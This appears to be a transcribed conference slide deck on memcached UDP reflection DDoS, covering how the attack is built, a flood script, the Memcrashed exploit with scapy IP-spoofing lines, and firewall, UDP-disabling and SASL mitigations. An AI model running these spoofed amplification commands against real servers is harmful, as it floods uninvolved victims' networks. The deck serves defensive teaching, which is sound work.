Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Memcache as udp traffic reflector

104 views

Published on

Memcacheas UDP Reflectors: A Massive Amplified DDoSthe World(Attack Formulation and Mitigation) by
Muhammad Morshed Alam, AmberIT Limited.morshed@amberit.com.bd

Published in: Internet
  • Be the first to comment

  • Be the first to like this

Memcache as udp traffic reflector

  1. 1. Memcache as UDP Reflectors: A Massive Amplified DDoS the World (Attack Formulation and Mitigation) Presenter Muhammad Morshed Alam AmberIT Limited morshed@amberit.com.bd <Abror Netwroks> <Shodan Stats>
  2. 2. Outlines • Memcache overview • Memcache Variables and Commands • Memcache DDoS Amplification Attack formulation, Amplification Factor • Memcache DDoS Tools (set and get requests, spoof UDP packets) • Mitigation (securing memcache servers using firewall and SASL authentication)
  3. 3. Memcached Overview • Free & open source, high-performance, distributed memory object caching system • Uses key-value to store arbitrary data (strings, objects) • Set (key, Data) <= save the data in key Get(key) => give the data from key • add, delete and replace commands to strictly insert/remove data in a key • Optimizes backend database performance by temporarily storing information in cache memory
  4. 4. Memcached Mitigates the Load from DB Speed up the Web App Response
  5. 5. Install Memcache Service # sudo apt-get update # sudo apt-get install memcached # sudo apt-get install libmemcached-tools Check the running process: root@bdnog-memcace:~# ps aux |grep memcache Output: memcache 207 0.0 0.1 63388 1952 ? Ssl Apr12 0:02 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1
  6. 6. Install Memcache Service Contd.. Verify open ports with the ss command or netstat command: # ss -tulpn | grep :11211 # netstat -tulpn | grep :11211 Configuration file: # sudo vi /etc/memcached.conf Service restart process: # sudo systemctl restart memcached
  7. 7. Memcache Variables and Commands: Connecting to the Memcache service: root@bdnog-memcace:~# telnet 127.0.0.1 11211 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. stats STAT pid 12476 STAT uptime 20 STAT time 1524726956 STAT version 1.4.25 Ubuntu STAT libevent 2.0.21-stable STAT pointer_size 64 STAT rusage_user 0.008000 STAT rusage_system 0.004000 STAT curr_connections 1 STAT total_connections 2 STAT connection_structures 2 STAT reserved_fds 20 STAT cmd_get 0 STAT cmd_set 0 STAT cmd_flush 0 STAT cmd_touch 0 STAT get_hits 0 STAT get_misses 0 STAT delete_misses 0 STAT delete_hits 0 STAT incr_misses 0 STAT incr_hits 0 STAT decr_misses 0 STAT decr_hits 0 STAT cas_misses 0 STAT cas_hits 0 STAT cas_badval 0 STAT touch_hits 0 STAT touch_misses 0 STAT auth_cmds 0 STAT auth_errors 0 STAT bytes_read 7 STAT bytes_written 0 STAT limit_maxbytes 67108864 STAT accepting_conns 1 STAT listen_disabled_num 0 STAT time_in_listen_disabled_us 0 STAT threads 4 STAT conn_yields 0 STAT hash_power_level 16 STAT hash_bytes 524288 STAT hash_is_expanding 0 STAT malloc_fails 0 STAT bytes 0 STAT curr_items 0 STAT total_items 0 STAT expired_unfetched 0 STAT evicted_unfetched 0 STAT evictions 0 STAT reclaimed 0 STAT crawler_reclaimed 0 STAT crawler_items_checked 0 STAT lrutail_reflocked 0 END
  8. 8. Memcache-tools and outputs # Setting data for a Key : set key 0 3600 16 Welcome to BDNog STORED # Getting return the value of key: get key VALUE key 0 16 Welcome to BDNog END Using of libmemcached-tools command: root@bdnog-memcace:~# memcstat --servers 127.0.0.1 Output: Give the present status of all memcache variables, i.e., STAT cmd_get 1 STAT cmd_set 1 root@bdnog-memcace:~# memcdump --servers 127.0.0.1 Output: All available keys that holding the data of cache, i.e., Key root@bdnog-memcace:~# memcat --servers 127.0.0.1 key Output: return the value of that key, i.e., Welcome to BDNog set <keyname> <some_flag> <expiration_in_millseconds> <length_of_data_to_follow>
  9. 9. Vulnerable Memcached Server • No authentication required to access • unauthorized inject big payload in cache • Listen on unreliable UDP/Port 11211 from any IP address • UDP allows unreliable data delivery, Target hosts receive data without prior consent stats of vulnerable memcached services available in internet (Qrator Lab and Akamai)
  10. 10. 1. Finds a memcache vulnerable server listening at UDP , port 11211 and high max size value of the variable limit_maxbytes 2. Run a memcache SET command and fills 1 key to it’s max size with data to ensure high payload 3. Sends multiple forged GET requests for that key using continuous UDP and spoof victim IP Attacker’s UDP Packets Contained: •UDP GET key requests •Size: 15B, SRC IP: spoof Target IP, DST Port:11211, Des. IP: Memcahe Host Vulnerable Memcached servers exposed at Internet and listening at UDP, Port: 11211 <Victims/Targets>  GET commands reflected to the victim IP with (key, value)  Value of DATA is high, i.e, T. Size=(key, value)*# of requests  GET Request 15B=> 750kB response, 50000x amplification (Akamai Report)  SRC IP: Memcache host, DST IP: Target, SRC Port: 11211 Attack Formulation
  11. 11. 1. Attacker may user multiple vulnerable memcached servers to a specific target IP by spoofing the SRC IP 2. Target network infra. overwhelmed with UDP Traffic Memcache Amplification DDoS on bandwidth consumption
  12. 12. Trends of Protocols Used for Reflection Most DDoS counted for Memcache (DDoSmon stats)
  13. 13. DDoS attack bandwidth 1.3 Tbps on Github !!!
  14. 14. Memcached Reflection Power Inserting key value to a vulnerable memcached server: # apt-get install python-memcache # python >>> import memcache >>> mc=memcache.Client([‘1.2.3.4:11211'],debug=True) >>> mc.set(‘tot2',3423443534324234234234234) True >>> mc.get(‘tot2') 3423443534324234234234234 Max Key Value (size) => 1 MB, repeating the get request for 1024 times => 1024 MB (1GB) reflected UDP Traffic !!!! 
  15. 15. Flooding the resource with Reflected UDP Traffic: # touch get_flood.py #!/usr/bin/env python import memcache mc = memcache.Client([‘202.4.96.85:11211'],debug=True) mc.set('tot2',1347534875923423432423) for i in range(10000): mc.get('tot2') print i root@morshed-Lenovo-G40-70:~#python get_flood.py MemCached: MemCache: inet:202.4.96.85:11211: connect: timed out. Marking dead.
  16. 16. Dump Packets: Memcache ServerGet Requests Sender
  17. 17. Dump Output Packets:
  18. 18. Dump Output Packets (PPS Curve) :
  19. 19. Memcached DDoS Tools Sends forged UDP packets (Spoof the SRC IP/Target IP) to vulnerable Memcached servers obtained using Shodan API # git clone https://github.com/649/Memcrashed-DDoS-Exploit.git # apt-get install python3 # pip install shodan ;search engine # pip install scapy ; require to manipulate UDP packets Pass the API key collected from https://account.shodan.io/login and put the target victim IP address to run the attack # python3 Memcrashed.py ;x00injected is the key and some arbitary value in inserted to cache setdata = ("x00x00x00x00x00x00x00x00setx00injectedx000x003600x00%srn%srn" getdata = ("x00x00x00x00x00x00x00x00getx00injectedrn") ;using scapy SRC IP manupluation and sending get request on behalf of victim/Target IP send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata) send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata)
  20. 20. Dump Data:
  21. 21. Mitigation
  22. 22. Step-1: Configuring The Firewall: For TCP: # /sbin/iptables -A INPUT -p tcp -s 172.16.11.0/24 --dport 11211 -j ACCEPT # /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP For UDP: # /sbin/iptables -A INPUT -p udp -s 172.16.11.0/24 --dport 11211 -j ACCEPT # /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP Or permanently Disable for zimbra colaboration: # /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP # /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP Note: Save the iptables rules and check the rules # iptables –L -v -n Secure memcached server to avoid DDoS amplification attacks
  23. 23. Step-2: Changing the Configuration: # sudo vim /etc/memcached.conf -l 127.0.0.1,172.16.3.1 ;listening from localhost and trusted block -U 0 ;disable UDP 11211 listening # sudo systemctl restart memcached Secure memcached server to avoid DDoS amplification attacks contd…
  24. 24. Validation of filtering rules: # nc 202.4.96.144 11211 # nc -u 202.4.96.144 11211 # telnet 202.4.96.144 11211 # sudo nmap 202.4.96.144 -p 11211 -sU -sS --script memcached- info
  25. 25. Adding Authorized user using SASL to Memcached Server: # memcstat --servers="127.0.0.1“ Output: Server: 127.0.0.1 (11211) pid: 3831 uptime: 9 time: 1520028517, version: 1.4.25 . . . SASL helps to add authentication for memcached servers clients. # sudo vim /etc/memcached.conf -S ;enable SASL -vv ;enable verbose output to /var/log/memcached Save and close the file. # sudo systemctl restart memcached # sudo journalctl -u memcached Output: Apr 27 22:03:58 memcached systemd-memcached-wrapper[2760]: Initialized SASL.
  26. 26. Adding Authorized user using SASL to Memcached Server: # sudo apt-get install sasl2-bin ; SASL user database # sudo mkdir -p /etc/sasl2 # sudo vi /etc/sasl2/memcached.conf mech_list: plain log_level: 5 sasldb_path: /etc/sasl2/memcached-sasldb2 # sudo saslpasswd2 -a memcached -c -f /etc/sasl2/memcached- sasldb2 morshed # sudo systemctl restart memcached # memcstat --servers="127.0.0.1" --username=morshed --password=*passwd*

×